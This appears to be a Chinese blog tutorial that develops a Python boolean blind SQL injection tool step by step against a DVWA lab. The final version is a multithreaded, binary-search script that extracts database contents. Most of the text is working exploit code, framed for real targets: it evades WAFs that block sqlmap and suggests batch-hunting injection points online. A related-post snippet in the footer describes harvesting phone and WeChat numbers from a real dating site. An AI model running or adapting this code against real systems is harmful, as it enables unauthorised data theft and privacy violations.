用shell写比赛晋级的脚本_用python写一个盲注脚本

最新推荐文章于 2024-06-11 18:48:44 发布
最新推荐文章于 2024-06-11 18:48:44 发布
阅读量252 收藏
点赞数 1
文章标签: 用shell写比赛晋级的脚本
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28766939/article/details/112753700
版权

一、    为什么要写脚本,相对其他方案有什么好处?

由于有waf,有注入点的不同,在任何时候,我们都应该优先手工注入,以此探测waf对于ip封禁,payload拦截的规则。
如果手工注入时,有联合注入,报错注入这种有显位的注入,稍微麻烦一点也无不可。但是很多时候,都没有显位,或者因为waf的存在,无法使用联合报错,只能使用盲注,盲注也比联合报错更加灵活,更加易于绕过waf。
手工盲注非常痛苦,所以不可避免的需要用到工具,工具有二,sqlmap和burpsuite。
sqlmap是很好的选择,但sqlmap的特征已被各大waf以各种方式拉黑,虽然可以以一些设置和编写tamper脚本来达到绕waf的目的。但由于payload还是以sqlmap设置好的固定逻辑进行尝试的,而现代waf的规则非常非常模糊,还是很容易触发。如果能够找到一种通用的绕waf方法,即某种手段让waf直接失效,sqlmap还是挺好用的。
用Burpsuite的intruder模块也是一个选择,而且本质上来说和自己写盲注脚本区别不大,但将注入的数据提取出来却比较麻烦。二、    先从请求一个url开始
即使是工具党,基本也很熟悉requests这个库了,因为各种poc利用脚本基本都会用到这个库。先安装一下。pip install requests
如果没做环境变量C:\Python37\Scripts\pip.exe install requests
如果有双python版本python3 -m pip install requests
安装好了之后,新建一个py脚本(注意两点,文件编码最好为UTF-8,否则不支持中文注释,脚本名最好偏一点,否则易和python自带的py脚本冲突)
写上两行代码

import requestsr = requests.get('https://www.baidu.com')

cmd运行python3 test.py
恭喜你,已经学会了。接着将url换成自己的web服务。

import requestsr = requests.get('http://luoke.cn:81/123')

c16cb979e6a593783e62154820cd11ab.png

单纯发起一个get请求就是这么简单,由此我们甚至已经可以在这个基础上稍加修改去批量寻找互联网上的注入点。
带参数的,可以这样

import requestsr = requests.get('http://luoke.cn:81/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit')

正式一点也可以这样

import requestsr = requests.get(url='http://luoke.cn:81/dvwa/vulnerabilities/sqli/',params={'id':'1','Submit':'Submit'})

POST就变成data

import requestsr = requests.post(url='http://luoke.cn:81/dvwa/vulnerabilities/sqli/',data={'id':'1','Submit':'Submit'})

加User-Agent和cookie,传递变量

import requestsurl = 'http://luoke.cn:81/dvwa/vulnerabilities/sqli/'data = {'id':'1','Submit':'Submit'}header = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'}cookie = {'security':'low','PHPSESSID':'cubgpcdg3bi2nu7n77vc6h0c9t'}r = requests.post(url=url,data=data,headers=header,cookies=cookie)

JSON需要用到内置json库

import requestsimport jsonurl = 'http://luoke.cn:81/json.php'data = {'id':1}header = {'Content-Type':'application/json'}cookie = {}r = requests.post(url=url,data=json.dumps(data),headers=header,cookies=cookie)

获取返回包内容,返回状态码

import requestsurl = 'http://luoke.cn:81/dvwa/vulnerabilities/sqli/'data = {'id':'1','Submit':'Submit'}header = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'}cookie = {'security':'low','PHPSESSID':'cubgpcdg3bi2nu7n77vc6h0c9t'}r = requests.post(url=url,data=data,headers=header,cookies=cookie)print(r.status_code)print(r.text)

88ef1cd36c9c4dd6989e2a4818052b2a.png

更多方法自搜。这儿还有个小问题,dvwa当然是登录状态才能使用,如果非登录状态访问sqli目录会302跳转到登录界面,python实际获取的就变成了login的返回包,返回状态,可以增加allow_redirects=False强制不跳转。

import requestsurl = 'http://luoke.cn:81/dvwa/vulnerabilities/sqli/'data = {'id':'1','Submit':'Submit'}header = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'}cookie = {}r = requests.post(url=url,data=data,headers=header,cookies=cookie,allow_redirects=False)print(r.status_code)print(r.text)

三、    增加判定和循环请求

布尔盲注都是从返回包里的某个地方不同来判断的,看一眼dvwa的sql注入靶场(注:我稍微修改过,变成数字型注入不需要单引号了)

30ddd309cd1a174660f30dc8fba9d1d7.png

很显然,用First name来判定就行了。if 'First name' in r.text
但如果我们需要获取First name以及后面可变的admin呢?
可以使用re扩展的一些方法,写一个简单的正则来获取,这种方法适用于从各种文件中提取固定内容的场景。

import requestsimport reheader = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",          "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",          "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",          "Accept-Encoding": "gzip, deflate",          "Connection": "keep-alive"          }cookie = {"security":"low","PHPSESSID":"8schtfh49iij91muatvd3m8c0p"}payload = ' and 1=1'data = {"id":"1"+payload,"Submit":"Submit"}r = requests.post('http://luoke.cn:81/dvwa/vulnerabilities/sqli/',cookies=cookie,data=data,headers=header,allow_redirects=False)print(r.status_code)text = re.search('First name: [a-z]*',r.text)print(text[0])

a4d152df6214a1c963e305638db68364.png

再写入盲注语句和空值判定

import requestsimport reheader = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",          "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",          "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",          "Accept-Encoding": "gzip, deflate",          "Connection": "keep-alive"          }cookie = {"security":"low","PHPSESSID":"8schtfh49iij91muatvd3m8c0p"}payload = ' and substr((select user()),1,1)="r"'data = {"id":"1"+payload,"Submit":"Submit"}r = requests.post('http://luoke.cn:81/dvwa/vulnerabilities/sqli/',cookies=cookie,data=data,headers=header,allow_redirects=False)print(r.status_code)text = re.search('First name: [a-z]*',r.text)if text == None:  print('null')else:  print(text[0])

这样面对有显位的注入方式,我们已经可以照葫芦画瓢用脚本来打印出注出来的数据了,但盲注必须多次发起请求,这样就必须了解for循环的使用方法。
尝试用for来生成全部url编码,先来一层循环

hex = '0123456789abcdef'for i in hex:   print(i)

a4312b2eb1a471c77ed66bd6dd25b474.png

再来一层循环,加上百分号,注意python由于不使用花括号,所以对缩进比较严格,注意控制空格数量。

hex = '0123456789abcdef'for i in hex:   for ii in hex:      print('%'+i+ii)

362c3bfd853d55caf9de8a1a61faba91.png

这样就制作了一个url编码字典,显然字典是需要保存成文件方便在各种工具上导入的。那么再加入文件写入函数。

hex = '0123456789abcdef'for i in hex:   for ii in hex:      iii = "%"+i+ii      print(iii)      fo = open("url.txt","a")      fo.write(iii+'\n')

当然这样io文件多次,对磁盘有影响,稍微变化一下只用写入一次。

hex = '0123456789abcdef'iii = ''for i in hex:   for ii in hex:      iii = iii+"%"+i+ii+"\n"print(iii)fo = open("url.txt","w")fo.write(iii)

知道了for循环怎么用,就可以带入盲注脚本中,先尝试跑出user()的第一个字符

import requestsurl = 'http://luoke.cn:81/dvwa/vulnerabilities/sqli/'header = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",          "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",          "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",          "Accept-Encoding": "gzip, deflate",          "Connection": "keep-alive"          }cookie = {"security":"low","PHPSESSID":"8schtfh49iij91muatvd3m8c0p"}dict = 'qwertyuiopasdfghjklzxcvbnm@_,.'for s in dict:   payload = ' and substr((select user()),1,1)="'+s+'"'   data = {"id":"1"+payload,"Submit":"Submit"}   r = requests.post(url,cookies=cookie,data=data,headers=header,allow_redirects=False)   if 'First name' in r.text:     print(s)

cda80447f9f752e8cdcadff306cb7a05.png

嗯,效果很好。那么再加一层for循环。

import requestsurl = 'http://luoke.cn:81/dvwa/vulnerabilities/sqli/'header = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",          "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",          "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",          "Accept-Encoding": "gzip, deflate",          "Connection": "keep-alive"          }cookie = {"security":"low","PHPSESSID":"8schtfh49iij91muatvd3m8c0p"}dict = 'qwertyuiopasdfghjklzxcvbnm@_,.'for i in range(1,15):   for s in dict:      payload = ' and substr((select user()),'+str(i)+',1)="'+s+'"'      data = {"id":"1"+payload,"Submit":"Submit"}      r = requests.post(url,cookies=cookie,data=data,headers=header,allow_redirects=False)      if 'First name' in r.text:        print(s)

ce1b10e15243aef9bc5c371e79a4c721.png

前面的报错是因为1-15的循环变量i是数字,不能直接和字符串拼接,所以要个str()转化一下。
我们可以弄个变量自增方便查看,顺便优化一下,爆破到正常字符就跳出增加效率

import requestsss = ''url = 'http://luoke.cn:81/dvwa/vulnerabilities/sqli/'header = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",          "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",          "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",          "Accept-Encoding": "gzip, deflate",          "Connection": "keep-alive"          }cookie = {"security":"low","PHPSESSID":"8schtfh49iij91muatvd3m8c0p"}dict = 'qwertyuiopasdfghjklzxcvbnm@_,.'for i in range(1,15):   for s in dict:      payload = ' and substr((select user()),'+str(i)+',1)="'+s+'"'      data = {"id":"1"+payload,"Submit":"Submit"}      r = requests.post(url,cookies=cookie,data=data,headers=header,allow_redirects=False)      if 'First name' in r.text:        ss = ss+s        print(ss)        break

2f44d61bf90fa7999278208327bd7abb.png

完美

四、    循环中断和用二分法增加效率


其实到这一步已经可以完成我们的目的了,但还可以继续优化。
首先我们提前知道uesr()的长度大概是多少,所以在第二层循环中可以设定循环次数,但如果爆表名,列名,内容的时候,可能会很长很长,如果设置range非常大的话,面对短数据又会浪费大量时间。
有两种方案可以解决此问题,一是使用length()来判定user()的长度,然后再设定range,二是当进行一次第一层循环之后,没有返回值则停止循环。
第一种方案显然有个问题,在判定user()长度的时候依旧要考虑user()长度到底是多少的问题,第二种方案则简单一些,当然也可以预见一些问题,比如出现特殊字符数字甚至中文,导致dict不全,停止了循环。
第二种方案我开始用的计数器,当第一层循环,循环了len(dict)次数后,还没有返回值,则终止循环。

import requestsss = ''url = 'http://luoke.cn:81/dvwa/vulnerabilities/sqli/'header = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",          "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",          "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",          "Accept-Encoding": "gzip, deflate",          "Connection": "keep-alive"          }cookie = {"security":"low","PHPSESSID":"8schtfh49iij91muatvd3m8c0p"}dict = 'qwertyuiopasdfghjklzxcvbnm@_,.'for i in range(1,10000000000000):   f = 0   for s in dict:      payload = ' and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),'+str(i)+',1)="'+s+'"'      data = {"id":"1"+payload,"Submit":"Submit"}      r = requests.post(url,cookies=cookie,data=data,headers=header,allow_redirects=False)      if 'First name' in r.text:         ss = ss+s         print(ss)         break      else:         f = f+1         if f == len(dict):            exit()

41ad188328540528bfd69564e531c1a5.png

后来发现只需要这样就行了

import requestsss = ''url = 'http://luoke.cn:81/dvwa/vulnerabilities/sqli/'header = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",          "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",          "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",          "Accept-Encoding": "gzip, deflate",          "Connection": "keep-alive"          }cookie = {"security":"low","PHPSESSID":"8schtfh49iij91muatvd3m8c0p"}dict = 'qwertyuiopasdfghjklzxcvbnm@_,.'for i in range(1,10000000000000):   f = 0   for s in dict:      payload = ' and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),'+str(i)+',1)="'+s+'"'      data = {"id":"1"+payload,"Submit":"Submit"}      r = requests.post(url,cookies=cookie,data=data,headers=header,allow_redirects=False)      if 'First name' in r.text:         ss = ss+s         print(ss)         f = 1         break   if f == 0:      break

这个时候,还应该思考一个问题,因为php魔术引号的存在,很多时候我们都无法直接拿英文字符去爆破,而是用的hex或者ascii。使用ascii码的时候,由于可以比较数字的大小,所以可以用二分法增加效率,同理,前面我们弃用的第二套方案,也可以用二分法来确定length(user())。
首先,我们先写出ascii(substr((select user()),1,1))>109的爆破脚本

import requestsss = ''url = 'http://luoke.cn:81/dvwa/vulnerabilities/sqli/'header = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",          "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",          "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",          "Accept-Encoding": "gzip, deflate",          "Connection": "keep-alive"          }cookie = {"security":"low","PHPSESSID":"49p2ajfb42snrojgu6sknn3nfu"}def sql(i,s):   payload = ' and ascii(substr((select user()),'+str(i)+',1)) > '+str(s)+' '   data = {"id":"1"+payload,"Submit":"Submit"}   r = requests.post(url,cookies=cookie,data=data,headers=header,allow_redirects=False)   if 'First name' in r.text :      return 1   else:      return 0for i in range(1,10000000000000):   f = 0   for s in range(32,126):      text = sql(i,s)      if text == 0 and s == 32 :         f = 1         break      if text == 0 :         ss = ss+chr(s)         print(ss)         break   if f == 1:      break

258d08fe91257cfc8681f5b97fd1efdc.png

然后琢磨一下二分法该如何写,设定上界a,下界b,(a,b)任意一数c,均为整数,判定c>(a+b)/2是否成立,成立(a,b)变为((a+b)/2,b),不成立则变为(a,(a+b)/2),然后再递归下去,一直到a,b区间为1,取c值为a。答案就呼之欲出了。

import requestsimport timess = ''url = 'http://luoke.cn:81/dvwa/vulnerabilities/sqli/'header = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",          "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",          "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",          "Accept-Encoding": "gzip, deflate",          "Connection": "keep-alive"          }cookie = {"security":"low","PHPSESSID":"49p2ajfb42snrojgu6sknn3nfu"}def sql(i,s):   payload = ' and ascii(substr((select user()),'+str(i)+',1)) > '+str(s)+' '   data = {"id":"1"+payload,"Submit":"Submit"}   r = requests.post(url,cookies=cookie,data=data,headers=header,allow_redirects=False)   if 'First name' in r.text :      return 1   else:      return 0for i in range(1,10000000000000):   text = sql(i,0)   if text == 0 :      break   def search(a,b):      global ss      c = int((a+b)/2)      text = sql(i,c)      if (b-a) == 1 :         ss = ss+chr(b)         print(ss)      else:         if text == 0 :            a = a            b = c            search(a,b)         else:            a = c            b = b            search(a,b)   search(33,126)

加个计数器对比一下同样使用33-126(ascii常用字符)的两者爆破效率。

55e3558336800dcf04a940ae5a635fcc.png

效率高的不是一点半点。五、    多线程的使用

多线程使用threading模块,使用方法为

th = threading.Thread(target=search, args=(33,126,1))th.start()th.join

search为方法,args为传入的参数,start开启线程,join阻塞python脚本不向下执行,直到该线程执行完毕,我们用个for循环开启多个线程就行了。

import requestsimport threadingurl = 'http://luoke.cn:81/dvwa/vulnerabilities/sqli/'header = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",          "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",          "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",          "Accept-Encoding": "gzip, deflate",          "Connection": "keep-alive"          }cookie = {"security":"low","PHPSESSID":"49p2ajfb42snrojgu6sknn3nfu"}def sql(i,s):   payload = ' and ascii(substr((select user()),'+str(i)+',1)) > '+str(s)+' '   data = {"id":"1"+payload,"Submit":"Submit"}   r = requests.post(url,cookies=cookie,data=data,headers=header,allow_redirects=False)   if 'First name' in r.text :      return 1   else:      return 0ss = {}def search(a,b,i):   global ss   c = int((a+b)/2)   text = sql(i,c)   if (b-a) == 1 :      ss[i]=chr(b)   else:      if text == 0 :         a = a         b = c         search(a,b,i)      else:         a = c         b = b         search(a,b,i)name = []for i in range(1,15):   th = threading.Thread(target=search, args=(33,126,i))   name.append(th)   th.start()for th in name:   th.join()sss = ''for i in sorted(ss):   sss += ss[i]print(sss)

加个计时器,计算单线程二分法和多线程二分法的速度。

8c6f04693dc5d154e35c625e12e1ed39.png

又快了一倍,但是还有优化的地方。第一,多线程是随机爆破字符的,所以必须要知道字符串的长度,第二,线程太多了反而不好,我们必须确定一个可控的线程数。
先实现第一个需求,此时有两种写法。
第一种写法,and length(user())>5,同样可以设定上下界,二分法去查,这种写法简单,效率最高。
第二种写法,select  ascii(substr(length((select user())),1,1)),即查询length(user())的第一位的ascii码,也就是1的ascii码,然后二分法去查。这种写法效率低一点,但好处是可以和之前的代码复用。看起来更加简洁。
不过第二种写法需要提前知道user()长度的长度,也就是length(length(user())),我们设定为5就行了。一般实战中不会碰到大于10w位的数据。由于使用二分法抛弃了中断功能,导致length(user())只有2位的话,后面3位会递归到下界,选择一个不存在的下界,替换掉即可。

import requestsimport threadingurl = 'http://luoke.cn:81/dvwa/vulnerabilities/sqli/'header = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",          "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",          "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",          "Accept-Encoding": "gzip, deflate",          "Connection": "keep-alive"          }cookie = {"security":"low","PHPSESSID":"49p2ajfb42snrojgu6sknn3nfu"}payload = 'select user()'flag = 0def sql(i,s):   if flag == 0:      data = {"id":"1 and ascii(substr(length(("+payload+")),"+str(i)+",1)) > "+str(s)+"# ","Submit":"Submit"}   else:      data = {"id":"1 and ascii(substr(("+payload+"),"+str(i)+",1)) > "+str(s)+"# ","Submit":"Submit"}   r = requests.post(url,cookies=cookie,data=data,headers=header,allow_redirects=False)   if 'First name' in r.text :      return 1   else:      return 0ss = {}def search(a,b,i):   global ss   c = int((a+b)/2)   text = sql(i,c)   if (b-a) == 1 :      ss[i]=chr(b)   else:      if text == 0 :         a = a         b = c         search(a,b,i)      else:         a = c         b = b         search(a,b,i)def thread(size):   name = []   for i in range(1,size+1):      th = threading.Thread(target=search, args=(31,127,i))      name.append(th)      th.start()   for th in name:      th.join()ssl = ''sss = ''size = 5def length():   global ssl   global sss   global flag   global size   if flag == 0 :      thread(size)      for i in sorted(ss):         ssl += ss[i]      size = int(ssl.replace(chr(32),''))      print('length : '+ssl.replace(chr(32),''))      flag = 1      length()   else:      thread(size)      for i in sorted(ss):         sss += ss[i]      print(sss)length()

ee42397b29d3065b2f41c0f7b74988b1.png

最后加入线程数量功能。

import requestsimport threadingurl = 'http://luoke.cn:81/dvwa/vulnerabilities/sqli/'header = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",          "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",          "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",          "Accept-Encoding": "gzip, deflate",          "Connection": "keep-alive"          }cookie = {"security":"low","PHPSESSID":"49p2ajfb42snrojgu6sknn3nfu"}payload = 'select user()'flag = 0def sql(i,s):   if flag == 0:      data = {"id":"1 and ascii(substr(length(("+payload+")),"+str(i)+",1)) > "+str(s)+"# ","Submit":"Submit"}   else:      data = {"id":"1 and ascii(substr(("+payload+"),"+str(i)+",1)) > "+str(s)+"# ","Submit":"Submit"}   r = requests.post(url,cookies=cookie,data=data,headers=header,allow_redirects=False)   if 'First name' in r.text :      return 1   else:      return 0ss = {}def search(a,b,i):   global ss   c = int((a+b)/2)   text = sql(i,c)   if (b-a) == 1 :      ss[i]=chr(b)   else:      if text == 0 :         a = a         b = c         search(a,b,i)      else:         a = c         b = b         search(a,b,i)def thread(size):   name = []   threads = 10   for ii in range(0,int(size/threads)+1):      for i in range(ii*threads+1,ii*threads+1+threads):         if i > size:            break         th = threading.Thread(target=search, args=(31,127,i))         name.append(th)         th.start()      for th in name:         th.join()ssl = ''sss = ''size = 5def length():   global ssl   global sss   global flag   global size   if flag == 0 :      thread(size)      for i in sorted(ss):         ssl += ss[i]      size = int(ssl.replace(chr(32),''))      print('length : '+ssl.replace(chr(32),''))      flag = 1      length()   else:      thread(size)      for i in sorted(ss):         sss += ss[i]      print(sss)length()

f71cee9583b07b705593d0ec7cd113d0.png

此为10线程和2线程的区别,在本地测试效果并不明显,如果在sql方法中加入sleep(0.1)来模拟延迟,则效果明显很多。

a869e44f115bf5c76bffffc719822ca9.png

轮王寺宫
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2023年03月 Python(一级)真题解析#中国电子学会#全国青少年软件编程等级考试
人生就是一个不断学习的过程
09-21 2043
Python中,变量的数据类型是根据赋值数据的类型推断得出的,但是变量的数据类型并不固定,可以随时改变。所以,题目中的判断是错误的。在Python编程中,print的功能是将print()小括号的内容输出到控制台,比如:在Python Shell中输入print(北京,你好)指令,小括号内容可以输出到控制台。所以,正确的答案是 C:turtle.fillcolor(color)指令中,color代表的是填充颜色,填充颜色不需要在填充前进行声明,每次调用该指令时都会立即应用新的填充颜色。
2023年03月青少年软件编程(Python)等级考试试卷(一级) 试题解析
bukpm888的博客
05-09 491
2023年03月青少年软件编程(Python)等级考试试卷(一级) 试题解析
sql 布尔盲注 python脚本实现
sophia9301的博客
10-12 7698
渣渣一枚,把学习sql注入过程中遇到的一些问题记录下来,以供日后参考。 按照网上教程注入时发现过滤了union = < > ,顿时就一脸懵逼,因为不会构造sql语句,更不会绕过,最后在师父的指导下,首先通过手工注入,注入出了数据库名及长度。 1.数据库名长度: http://XXX.XXX.XX/sql.php? id=345’ and length(database()) like 1 an
爱上python盲注探测脚本
dfdhxb995397的博客
09-13 170
  本文转自:i春秋论坛 前言:   最近在学python,做了个盲注的简单的跑用户的脚本,仅做个记录。   sqmap也有不灵的时候,有时需要根据情况自脚本探测   正文:   本地用大表姐给的sql和php文件搭建了个布尔盲注的靶机   另外感谢大表姐的指导。   稍作解释:注入语句里用%s占位,等待在for循里面依次判断长度 [App...
Python盲注自动化脚本
qq_42990434的博客
05-14 1502
注入中盲注它要花费很多时间进行排除,所以作为小白的我也想尝试如何去编简单的 python脚 本,来提高挖盲注的效率。 说到盲注的排除,我们第一时间就会想到二分法,因为不可能逐个逐个的用 “=” 去排除,这样浪费的时间会更多,所以脚本的编我也是用二分法的,下面我会用自己盲注数据库名字的例子来说明一下: #!/usr/bin/env python # coding:utf-8 import requests import sys url = "http://xxx.xxx.xxx.xxx/xxx/xxx
python mysql盲注脚本
夜班机器人的博客
07-26 2533
某相亲网漏洞,可盲注获得手机号和微信号。 功能1:爬取所有女性ID、年龄、月薪、照片URL 功能2:通过盲注方式获取对应ID的手机号和微信号 功能3:所有数据自动导入MYSQL 缺点:单线程
Python 安全开发 时间盲注脚本
YouthBelief的博客
10-26 1401
时间盲注0x00 时间盲注原理用到的函数有流程0x01脚本 (请求少,费时多)1.1用到的库1.2判断页面响应1.3判断返回字符串长度1.4 获取查询结果1.5 主函数0x02 脚本(请求多,费时少) 0x00 时间盲注原理 时间盲注应用于 页面 无论输入什么 页面显示 内容都一样, 可以用 ’ and sleep(5) --+ 发现 页面响应超过5秒 用到的函数有 sleep(5) 延时函数 延迟5秒 if($SQL,sleep(5),1) if函数 如果sql语句为真,执行sleep
shellshell脚本实战-shell脚本函数详解,我就不信你还听不明白了
cxa558的博客
03-22 895
[]( )shell 函数的调用 调用 Shell 函数时可以给它传递参数,也可以不传递。如果不传递参数,直接给出函数名字即可: 比如上文的 gaosh 如果传递参数,那么多个参数之间以空格分隔: gaosh 1 2 3 注意: 和其它编程语言不同的是,Shell 函数在定义时不能指明参数,但是在调用时却可以传递参数,并且给它传递什么参数它就接收什么参数。 Shell 也不限制定义和调用的顺序,你可以将定义放在调用的前面,也可以反过来,将定义放在调用的后面。 举例: #!/bin/bash inpu
最新终于把所有的Python库,都整理出来啦!_python 自带的键盘库(1)
2401_84558914的博客
05-03 1108
Python崛起并且风靡,因为优点多、应用领域广、被大牛们认可。学习 Python 门槛很低,但它的晋级路线很多,通过它你能进入机器学习、数据挖掘、大数据,CS等更加高级的领域。Python可以做网络应用,可以做科学计算,数据分析,可以做网络爬虫,可以做机器学习、自然语言处理、可以游戏、可以做桌面应用…Python可以做的很多,你需要学好基础,再选择明确的方向。这里给大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
2023年3月Python一级
最新发布
qq_53280238的博客
06-11 460
29. 在海龟画图中,turtle.forward(100)指令可以让小海龟向前走,turtle.backward(100)指令可以让小海龟向后走,同时小海龟的头会转向相反的方向。28. ‘88’是一个字符串类型数据,如果将单引号去掉,它就变成了整型数据,同理‘python’也是一个字符串类数据,如果将单引号去掉,它也会变成整型数据。C. turtle.fillcolor(color)指令中,color代表的是填充颜色,填充颜色需要在填充前进行声明,否则以默认颜色或者上次的填充颜色来填充。
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
python布尔盲注脚本
kiihuang的博客
03-28 513
使用python,编一个可以自动爆破的布尔盲注脚本,根据不同情况调整里面的Content-Length的值。
python脚本自动化盲注_Python SQL盲注脚本
weixin_42181686的博客
02-11 380
Python SQL盲注脚本2018-11-30268基于布尔盲注#!/usr/bin/env pythonimport requests#dbs#SELECT GROUP_CONCAT(SCHEMA_NAME) FROM information_schema.SCHEMATA#tables#SELECT GROUP_CONCAT(table_NAME) FROM information_sche...
帮我一个时间盲注python脚本
weixin_35757531的博客
01-03 207
时间盲注攻击是一种数据库攻击方法,其目的是通过构造特殊的SQL查询语句来猜测数据库中的数据。在进行时间盲注攻击时,攻击者会在SQL查询中包含一个或多个条件,并通过测量查询的执行时间来判断条件是否成立。 下面是一个使用Python实现时间盲注攻击的示例代码: importtime import requests # 目标数据库地址 url = "http://database.com/query"...
构造exp-Python盲注脚本
告白的博客
08-12 475
0x00 搭建环境介绍 平常的盲注如果手工会很麻烦,多数情况都会借助sqlmap等相关软件跑,但是有些情况下,考虑到sqlmap的线程以及其他情况,会造成其他的影响,这里我们来简单使用python构造一个盲注脚本,低线程,高效率。 利用到metinfo老版本平台,平台中集合多种漏洞,本次实验实验python构造盲注exp,实现注入 手工注入测试: 0x01 利用python构造exp-盲注脚本 import requests def get_html(url): "我的功能判断页面内容是否
python脚本之布尔盲注
ro4lsc的博客
04-21 7147
这个好像也没什么可以多说了,那么直接上脚本吧 import optparse import requests #---------------------------- usage = "python3 %prog -u <URL> -P <patten> -F <find text>" parser = optparse.OptionParser(usage...
用py一个时间盲注脚本(初学向)
qq_62540010的博客
02-06 3473
用py一个时间盲注脚本 1. 首先我们要清楚时间盲注的特点是利用了sql中sleep这个函数,借助的是响应时间不同来判断构造语句的对错,那么我们主要思路就要通过记录响应时间来执行一系列操作,下面是我一个简单脚本 2. import requests import time for i in range(1,20): url="http://127.0.0.1/sqli/Less-9/?id=1'and if(length(database())={i},1,sleep(5))--+"
基于python的布尔盲注爆破脚本(sqli-libs第八关)
henghengzhao_的博客
10-06 1893
这个脚本的原因是因为布尔爆破步骤的繁琐,因此下这个半自动化脚本来提升效率,只需输入url和标志词便可开始爆破
Python 安全开发 布尔盲注脚本
YouthBelief的博客
12-03 1253
python开发-批量fofa+poc验证0x00 思路0x01 脚本1.fofa爬取步骤一:请求搜索地址 以 GlassFish 任意文件读取 为例 0x00 思路 要想批量验证漏洞是否存在需要考虑的点: 1.获取可能存在漏洞的地址信息。 1.1可借助fofa获取目标 影响版本是 <= 4.1.1 fofa指纹 "GlassFish" && port="4848" && country="CN" 或者 "GlassFish" && port
一个shell脚本执行shell脚本
11-17
可以使用以下命令来执行一个shell脚本: ```shell sh /path/to/script.sh ``` 其中,`/path/to/script.sh`是要执行的shell脚本的路径。如果你想要在脚本中指定解释器,可以在脚本的第一行添加`#!/bin/bash`或`#!/bin/sh`等指令。 如果你想要在一个shell脚本中执行另一个shell脚本,可以使用以下命令: ```shell sh /path/to/another_script.sh ``` 或者,如果你想要在当前shell中执行另一个脚本,可以使用以下命令: ```shell source /path/to/another_script.sh ```
评论
